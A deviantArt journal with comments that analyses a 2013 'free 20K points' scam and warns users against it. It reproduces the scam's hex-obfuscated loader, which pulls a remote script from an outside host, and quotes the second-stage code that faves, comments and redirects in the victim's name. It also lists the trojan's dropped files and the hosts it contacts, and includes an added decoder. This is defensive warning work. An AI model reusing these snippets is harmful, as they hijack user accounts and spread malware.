
Stop the "Get 20K points" invasion



Before you do anything stupid, please read this

Obviously, this offer is a swindle, and as such it is dangerous for you!

Table of contents

  • What it does
  • And then what?
  • What can we do?
  • "I installed it, but I'm okay"
  • "OMG my brother did it!"
  • Updates

    What it does

    "\x61" is just another way to write "a" (a hexadecimal escape sequence). Thus, ["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"] is just written words; script, actually. You can have it safely translated by using the "unescape" JavaScript function on this part of the script only.

    Once translated, this script does one thing: it includes a bigger, more elaborate script as part of the DA page. This script can be found here: deviantart.hp.af.cm/generator/… This script will now be able to act in your name.

    Note that this script is NOT hosted by the deviantart.com website. It is a foreign website, hosted in Cameroon (Africa), so that the scammers can't be found by regular, simple investigations. They are hiding, and hiding well.

    This new script does something else. For now (but it might change):

    document.getElementById("gmi-ResourceViewFaveButton").click();

    It simulates a click on the "Fave" button.

    document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";

    It writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!".

    setTimeout("document.getElementsByClassName('ll f')[0].click()", 100);

    It schedules something that will hide these actions by reopening the comment area once the comment is posted.

    document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click();

    It submits the comment (in your name).

    window.top.location.href='deviantart.hp.af.cm/generator';
    alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')

    It programs a redirection to their website and displays an alert that says "DeviantART: Welcome to deviantART's Points Generator! You will be redirected to our generator. Click OK to proceed".
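    An added example (not part of the journal and not the scam script's own code): this small JavaScript decoder turns the "\xNN" escapes of the obfuscated array quoted above back into plain strings by text substitution alone, with no eval or unescape, so the script is never executed while you read it, and then flags the createElement/src/appendChild pattern of a remote script injection and lists the URL it would load. The array literal embedded in the code is the one quoted in the journal.

```javascript
// Added example: decode "\xNN" escape sequences by plain text replacement,
// so the obfuscated scam script can be read without ever being executed.
// The array literal below is the one quoted in the journal (String.raw keeps
// the backslashes as literal text instead of letting the JS parser decode them).
const OBFUSCATED_ARRAY = String.raw`["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"]`;

// Replace every \xNN with the character it encodes. Only the two-hex-digit
// form is handled; anything else is left untouched, and nothing is run.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9A-Fa-f]{2})/g,
    (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Pull every double-quoted literal out of an array-literal string and decode it.
function extractStringLiterals(arrayText) {
  const out = [];
  const re = /"((?:[^"\\]|\\.)*)"/g;
  let m;
  while ((m = re.exec(arrayText)) !== null) {
    out.push(decodeHexEscapes(m[1]));
  }
  return out;
}

// The journal's finding as one check: the decoded words are exactly the
// ingredients of a dynamic <script> injection (createElement + src + appendChild).
function looksLikeScriptInjection(tokens) {
  const need = ["createElement", "script", "src", "appendChild"];
  return need.every((w) => tokens.includes(w));
}

// Any decoded token that is an http(s) URL is where the second-stage script
// would be fetched from; that host is what a defender would block or report.
function findRemoteScriptUrls(tokens) {
  return tokens.filter((t) => /^https?:\/\//i.test(t));
}

// Stand-alone run: show what the scam array really says.
const decodedTokens = extractStringLiterals(OBFUSCATED_ARRAY);
console.log(decodedTokens);
console.log("script injection:", looksLikeScriptInjection(decodedTokens));
console.log("remote scripts:", findRemoteScriptUrls(decodedTokens));
```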

    And then what?

    And then you won't get any DA points, indeed. I bet you guessed that already… Instead, they will tell you "Oh, you don't have this great plugin, come and download it!" and launch the download anyway. And this is where you get screwed if you are gullible enough to run an executable file from a random site hidden in Cameroon… I don't know (yet) what this exe file does. But I know what it could do. First of all, it might be (and probably is) a security breach on your computer: Trojan, virus, remote agent… Which in turn could be aimed at several things: spreading this publication so that others get screwed, stealing personal information (such as payment card numbers), using your computer as a proxy for network attacks… If you already downloaded the file, please be very careful. Run antivirus detection and malware removal on your computer now, and again in a few days. Firewall protection is a must-have. The malware might steal your "cookie" too. This means that your password might be compromised, and actually not only for deviantArt.

    What can we do?

    For now, we can try to warn and inform people, and try to make them stop spreading this stupid hoax. If you have any idea of what more to do, please comment.

    "I installed it, but I'm okay"

    Are you so very sure of this? FYI, virustotal.com ran a detection on the exe file using 45 antivirus engines and states that only 3 of the 45 engines tested found a threat. The report can be found here: see the virustotal report. Now, do as you want.

    "OMG my brother did it!"

    I did not download/run that exe file, am I safe?

    As far as I know:
    • There was no harmful code in the JavaScript stuff that I saw, but it can change at any time.
    • Any reasonable browser should not be able to execute a downloaded file without warning you first (and the "plugin" stuff is, AFAIK, only a fake div displayed as part of the web page, so not harmful in itself).
    • I think that the only thing really endangered by the JavaScript is your session cookie, so changing your password might be wise.
    • I have heard of other, more sophisticated attacks like buffer overflows and such, but I'm not competent enough to tell you whether there is such a threat here. So consider yourself not safe until someone can tell us whether such a potential threat exists.
    Thus I would say that, as far as I know, you should be relatively safe, but I also know that this is a huge field and that I'm no pro. So you should consider being careful, and keep antivirus + firewall protection up to date on your computer (as everyone else should).

    Connected Viruses/Malware/Adware identified

    One or several of these pieces of malware might have been dropped on your computer if you ran this exe file:
    • Trojan
      • Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
      • Identified by Fortinet as MSIL/Agent.HG!tr.spy
      • Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
      • Identified by many other malware detectors as Trojan.GenericKD.966175
      • This is a serious threat.
      • This is a Trojan, which means it is malicious software spying on your computer and sending (or giving access to) this data to malicious people. See the Internet Holy Bible for reference.
      • Some antivirus products are free. See the Mighty Source of all Truth for reference.
      • Fresh news here thanks to ~krisiskiller101's investigations!
        • He was able to get rid of it using MalwareBYTES.
        • He confirmed that the RASMan service was up on his computer. Though this service is not supposed to be harmful and might have been up before, it might also be part of the trojan attack that was not turned off by the fix because it is not harmful alone.
        • Thanks for the info!
    • AdWare.iBryte.H
      • Seems to be a recent version of the well-known adware iBryte.
      • Only Comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
      • Be very careful, as searching for "iBryte.H removal" can lead to spywareprotectiontool.com, which is a malicious website giving you malware instead of solutions.
      • You can find instructions for this adware's removal by searching for "iBryte removal", but I don't know if they would work with this version of the adware (please tell us if you have any success with one of these procedures).
    • Optimum Installer (fs)

    Personal investigations

    I don't have a packaged solution, and I probably won't have enough time to investigate this stuff thoroughly. Yet I found some hints by diving modestly into this sh*t. I share them for the people it might help. This program does the following:
    • It messes up your registry in a theatrical way
      • It probably affects the download manager associated with your web browser
      • It probably affects the toolbars in your web browser
      • Writes 'test' everywhere in the registry
      • Messes with your IE cache
    • Creates files
      • Creates an executable file named "D2M-Precheck.exe", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
      • Creates a DLL file named "check_offer_rp.dll", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
      • Creates copies of these two files in a subdirectory of "C:\Document and settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
    • Runs the created exe file, which in turn spoils your computer:
      • Creates a new "exe" file named "Impressioner.exe" along with "System.Data.SQLite.dll" and "imp.dat" files, hidden at the same place: "C:\Document and settings\Your_User_Name\Local Settings\Temp"
    • Transfers data over the internet with the following addresses
      • imp.oi-imp1.com
      • config.oi-config1.com
      • d1uc4fr8hoy8ts.cloudfront.net
      • cdn.install.oibundles2.com (the only thing done here is downloading the dll file mentioned before)
      • cache-download.real.com
      • d2m.adk-mobile.com
    • Probably displays advertising
    Be careful: this is not an exhaustive list. And not everything listed above is necessarily harmful (e.g. SQLite.dll is just a database library they use, not a virus in itself, probably). Do not edit your registry if you don't know exactly what you are doing. Moreover, I have no idea what this "impressioner.exe" does, so there might be a lot more mess to clean. By the way, if you were infected and are able to find this file, please consider sending a copy of it to me. -edit- Okay, it will be hard to find this file on your drive: this file "does something" (including turning on the RASMAN service) and then deletes itself. This is really not comforting. That said, and with no guarantee of any kind ("do it at your own risk" and so on), I think that you can safely delete the exe and dll files mentioned above. It might rid you of part of the infection. If you have more information or if you can teach me something about this kind of investigation, please contact me and I will update. This information might even be wrong depending on your OS and configuration!

    Updates

    • There are at least 2 scripts now: mix.js and nr.js (the second one only faves, without leaving a comment)
    • There are at least two messages spreading this sh*t
    • It seems I was totally wrong in thinking that infected people were spreading those messages. It is more probably bots registering and posting every x seconds
    • Mutations!
      • The scam changed in form. It now has many titles including:
        • Free 20k dA Points Is Here!
        • dA Points For Free
        • Learn How To Get dA Points Instantly!
        • Instant Free dA Points!
        • Get dA Points Without Buying!
      • But the content changed too
    • New script: generator/stript.js
      • Looks like they leveled up
      • As far as I understand it, it will make your browser all busy and unresponsive, and during this time it will poop comments on as many other submissions as possible
      • These comments are more spam messages redirecting to their malware download website
      • I think that this script only uses you as a means of spreading the spam and does not lead you to the malware download
      • However, the spam that will be pooped by your account on others' deviations will lead to the malware
      • After careful testing (by deactivating the malicious part while keeping the core of the script), I can confirm this, adding that during the browsing/commenting it displays fake information as a cover hiding what is going on
      • It is relatively efficient. During the few seconds (between 5 and 10) of my test, I would have posted 5 malicious comments
      • If it happened to you:
        • You should be able to find the scam post from where you messed up, as you faved it
        • From there, using the "next" button which is on top of the screen near the deviantART logo, you will be able to browse the deviations that you have spammed
        • Delete/hide your offensive comments
    • What do the admins do?!
      • ~peppy-heppy asked them and here is the answer he received:
      • "We've checked over the activity associated with this profile and have found that it does qualify as a type of "spamming" so we have banned this account, along with others we've found to be doing the same. We're currently investigating new methods in dealing with this issue and hopefully bringing it to a stop. Until then, we'll continue to handle the problem as fast as we can.

        Please let us know if you find this sort of thing happening again. Thank you!"
    Thanks for reading.
Trying to get this hoax propagation slowed down…

Thanks to :iconkrisiskiller101: ~krisiskiller101 for the vm test report !

(by the way, English is not my native language, so if you can't understand some part of this article, please report it so that I can correct it and improve my English!)
Add a Comment:
 
:icondamariobros1:
Damariobros1 Featured By Owner Edited Apr 6, 2017
ESET Smart Security 9 is the best Anti-Virus Program out there. To make sure that you find it, open ESET, click the second tab on the side, and click "Custom Scan". Click "Local Disk (C: )" and then click the drop-down box that currently says "Smart Scan" and click "In-Depth Scan". Finally, click "Run as Administrator" (It should have the little Windows Administrative Permissions Shield next to it) and click "Yes". The scan will take 5 hours at the very least, but that is because it is searching every bit (data size that 8 of them equals 1 byte, not "every bit") of every single file 5 times before moving to the next file, and being very thorough in its search. It will also be able to access more files from having Administrative Privileges (Run as Administrator), so that makes it ten times longer. When it FINALLY DOES complete the scan, the threat should be there and queried, which means it has been safely confined/stored and disabled by ESET and sent to an ESET Research Center for analysis. All you have to do now is send it to NUL and permanently delete it from your computer, without taking it out of the query list. It should also fix all the damage done to your computer automatically. I am telling you this from personal experience. Use ESET for this Trojan/Bug/Whatever you call it to get rid of it. BTW I don't know if it will work on iOS, but it definitely is compatible with Windows.
Reply
:iconsaliohoytia2525:
Saliohoytia2525 Featured By Owner Aug 28, 2016  Professional General Artist
I have this ---> fav.me/dae3b9n
Reply
:icontnynfox:
Tnynfox Featured By Owner Jun 27, 2016  Student General Artist
An artist who digitally draws dog packs called out villapascoli.it for allegedly using her files to spread malware.  If that's true then, ouch.
I hope she's not blamed for the malware.
Pretty much anyone can collect images online, including malware crooks.
Reply
:iconhiqikura:
Hiqikura Featured By Owner May 10, 2016  Hobbyist Digital Artist
hahaha i coming!!!
Reply
:iconasfoxger:
AsFoxger Featured By Owner May 4, 2016  Hobbyist Digital Artist
They keep coming.

Everyone, keep reporting.
Reply
:icongrimm-girlie:
grimm-girlie Featured By Owner Apr 13, 2016
Whenever I see a new spammer I send them a note that says "what's it like to be dead inside" or depressing song lyrics and see if they answer.
Reply
:iconxfell:
xFell Featured By Owner Jul 21, 2017  Hobbyist General Artist
I wish I could like comments on deviantart, this made my day.
Reply
:icondshere:
Dshere Featured By Owner Mar 14, 2016
inger57423.deviantart.com/
Latest version of spammer.
He is using statictab.com as a dropsite.
I wonder what virus total would find on his time this time.
Reply
:icondshere:
Dshere Featured By Owner Feb 20, 2016
2016, and Retardo the Hackinator has been at it for several weeks again.
Reply
:iconflippyisadorable:
Flippyisadorable Featured By Owner Feb 14, 2016  Hobbyist General Artist
One time I tried to download something for free Animal Jam membership and ended up downloading CrossBrowse. Then my mom went on her Amazon account using it and a few days later, her account got hacked and her password was changed...   ._.
Reply
:iconyouvegotnoidea:
YouveGotNoIdea Featured By Owner Feb 3, 2016  Student Digital Artist
Spambot located: nebumav.deviantart.com/
Reply
:iconalphawolfheart:
AlphaWolfheart Featured By Owner Aug 10, 2015  Hobbyist Digital Artist
thank god, it can't run on Windows 10
Reply
:iconkaylarge-chan:
Kaylarge-chan Featured By Owner Mar 31, 2016  Hobbyist Digital Artist
I know right!
Reply
:iconcypher-boss:
Cypher-Boss Featured By Owner May 16, 2014
It didn't even download for me, so that's that! XD
Reply
:iconxyliarraina:
XyliarRaina Featured By Owner Nov 30, 2013  Hobbyist Traditional Artist
Thanks so much! I just found another one I was about to do! I forgot the name but it led me to an Israeli Website... I'll try to find it to see if it's in cahoots with this one.
Reply
:iconxyliarraina:
XyliarRaina Featured By Owner Nov 30, 2013  Hobbyist Traditional Artist
Ok I found that this post is basically the only thing in her (or his) gallery, and they just joined this week... should I report this person just in case?
Reply
:icondragonthing009:
dragonthing009 Featured By Owner Apr 28, 2016
yes
Reply
:iconponies21:
Ponies21 Featured By Owner Nov 18, 2013
Is this relevant or can someone tell me if it is real?? m.youtube.com/watch?v=7N33-VLJ…
Reply
:iconlittleghostii:
LittleGhostii Featured By Owner Nov 13, 2013  Hobbyist Digital Artist
:icondeviantartpointshack:
Another e_o
Reply
:icondshere:
Dshere Featured By Owner Nov 2, 2013

Correction:

Fileice.net is where he is hosting his spamware.

fileice.net/download.php?t=reg…

fileice.net/mobiledl.php&f… <--------he's going after mobiles now

support@fileice.net <--contact email for the hosting service

Reply
:icondshere:
Dshere Featured By Owner Nov 2, 2013

gituvoga.deviantart.com/

And he has a new shortener gg.gg/freepoints.

Redirects to something that flashes on the screen as "fliece.com/download etc etc"

Reply
:iconaskinnywhiteguy:
ASkinnyWhiteGuy Featured By Owner Nov 2, 2013
IT HAS BEGUN AGAIN
Reply
:iconxssd:
XSSD Featured By Owner Aug 9, 2013
thank you
Reply
:iconderse-dreamers:
derse-dreamers Featured By Owner Jul 28, 2013
wow, i never knew this... i knew that it was a hoax [it was very obvious] but wow, thank you
Reply
:iconkarisean:
Karisean Featured By Owner Jul 3, 2013
Very informative. I've been really wondering what all those scam messages were really doing behind the scenes.
Reply
:iconguardian-aegislash:
Guardian-Aegislash Featured By Owner Jul 1, 2013  Hobbyist Digital Artist
Thank god someone posted something about this. These bots are getting annoying with this "Free 20k Points" thing. 
Reply
:iconaskinnywhiteguy:
ASkinnyWhiteGuy Featured By Owner Jun 30, 2013
Has the pestilence finally been exterminated???
Reply
:icongraphicsgail:
GraphicsGail Featured By Owner Jul 2, 2013
Plague and Black Death. :iconlolmemeplz:
Reply
:iconthedoggiediva:
TheDoggieDiva Featured By Owner Jun 29, 2013  Student Digital Artist
Yea I HATE this 20k points instructions thingy. STOP SPAMMING BOT!!!
Reply
:icongraphicsgail:
GraphicsGail Featured By Owner Jun 28, 2013
I will add anti-spam puzzles to my website and make it so no spammers can come.
Reply
:iconmariosonicanimefan:
Mariosonicanimefan Featured By Owner Jun 26, 2013  Hobbyist Digital Artist
Question:
What happens if you follow that hoax using your IPhone/IPod/Ipad?
Reply
:iconpetersong:
PetersonG Featured By Owner Jun 27, 2013
Seems it does not work at the moment, but the case seems to be handled, though. Might be broken only when I tried. Might be planned for later…
I've no IPhone/IPad/IStuff to test, then it's hard to tell for sure.
Reply
:iconmariosonicanimefan:
Mariosonicanimefan Featured By Owner Jun 27, 2013  Hobbyist Digital Artist
Oh .–. Then I must still be cautious about these Hoaxes while using my Ipad...
Reply
:iconpetersong:
PetersonG Featured By Owner Jun 27, 2013
Did your IPad download something? Did it install something?
If not, I think you're relatively safe (because of the way they proceed, not using too offensive methods to install on devices until then)
Maybe you've only seen a screen speaking of accepting to fill a form that did not work?
Reply
:iconmariosonicanimefan:
Mariosonicanimefan Featured By Owner Jun 27, 2013  Hobbyist Digital Artist
Well,I didn't download anything,so I should be fine....
Reply
:iconoobenedictaoo:
OoBenedictaoO Featured By Owner Jun 23, 2013
Here it is another one [link]
Reply
:iconbluhbluhwords:
Bluhbluhwords Featured By Owner Jun 19, 2013  Hobbyist General Artist
Just found another one of the tutorials for this junk [link]
Reply
:iconpetersong:
PetersonG Featured By Owner Jun 20, 2013
The pointed address seems inactive, though.
Maybe we're rid of this junk in the end ^^'
Reply
:iconbluhbluhwords:
Bluhbluhwords Featured By Owner Jun 20, 2013  Hobbyist General Artist
That's what we all hope; But some people are just lurking and waiting to publish a new attack soon....
Reply
:iconpetersong:
PetersonG Featured By Owner Jun 22, 2013
Yes and they did : [link]
Though, they changed their address and now use facebook to host and spread their spam.

I think reporting this page could be a good idea :
[link]
Reply
:iconaskinnywhiteguy:
ASkinnyWhiteGuy Featured By Owner Jun 6, 2013
:iconsadplz: They’re…they’re back…[link].
God help us all.
Reply
:iconaskinnywhiteguy:
ASkinnyWhiteGuy Featured By Owner Jun 4, 2013
I haven't seen any of these in like a week...is it finally over now?
Reply
:icontripptaylor:
tripptaylor Featured By Owner Jun 1, 2013  Professional Photographer
[link]

what about this ?
Reply
:icondshere:
Dshere Featured By Owner May 26, 2013
Belay that.
Anklebite7 is no more.
Reply
:icondshere:
Dshere Featured By Owner May 26, 2013
[link]

Ankle7helen is the latest handle for this clown.
Reply
:icondshere:
Dshere Featured By Owner May 26, 2013
Currently the spammer is using appfog to obfuscate the url, the appfog page is set to a simple redirect since Appfog has been blasting his pages on sight.
So the redirect goes by unnoticed, and takes you to pagebin.
contact@pagebin.com is pagebin's email address.
Though they have said they don't mind "gurilla marketing" (sic)
They seem to believe that the guy is legitimate marketing.
Current pagebin suffixes for the spammer are:
/ofP6Uevw
/DpolNpF3
/vNxMOPVS

Pagebin seems to have no intention of removing the malware spreading pages.
Reply
:iconhybridrex:
HybridRex Featured By Owner May 26, 2013  Hobbyist
I'm no programmer, but even I have to admit it's too easy to set up an account. As annoying as they are,
couldn't you make a user do a "CAPTCHA" puzzle to sign up? Or is there a way to get past that?
Reply
:iconpkgam:
PkGam Featured By Owner May 26, 2013  Hobbyist General Artist
Whoa! This is a much bigger problem than I thought it was. Like, I've been seeing these spammers for a while, but I didn't know they were so well hidden. I figured they would soon be tracked down for their shenanigans, but they seem really troublesome. Hopefully one day they get stopped or simply get bored.
Reply
:iconraeki-eragon:
raeki-eragon Featured By Owner May 26, 2013  Hobbyist Artist
[link] here's another one... watch out
Reply
Details

Submitted on
April 27, 2013